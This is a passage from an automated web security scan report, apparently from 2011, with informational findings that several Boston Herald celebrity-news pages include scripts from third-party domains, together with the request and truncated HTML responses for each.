http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/celebrity/view/20110126motley_crue_singer_dodges_media_in_vegas_dui_case/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:45:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.744. http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:43:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.745. http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/srvc=track&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:43:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.746. http://www.bostonherald.com/track/celebrity/view/20110127sean_connery_immortalized_with_estonian_bust/srvc=track&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/celebrity/view/20110127sean_connery_immortalized_with_estonian_bust/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/celebrity/view/20110127sean_connery_immortalized_with_estonian_bust/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:44:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.747. http://www.bostonherald.com/track/celebrity/view/20110128chips_star_larry_wilcox_gets_probation_for_securities_fraud/srvc=track&position=recent_bullet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/celebrity/view/20110128chips_star_larry_wilcox_gets_probation_for_securities_fraud/srvc=track&position=recent_bullet

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/celebrity/view/20110128chips_star_larry_wilcox_gets_probation_for_securities_fraud/srvc=track&position=recent_bullet HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:45:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.748. http://www.bostonherald.com/track/inside_track/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /track/inside_track/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:33:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 56944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.749. http://www.bostonherald.com/track/inside_track/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

18.750. http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:31:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.751. http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/srvc=track&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110127boy_banders_faithful_to_fenway/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/inside_track/view/20110127boy_banders_faithful_to_fenway/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
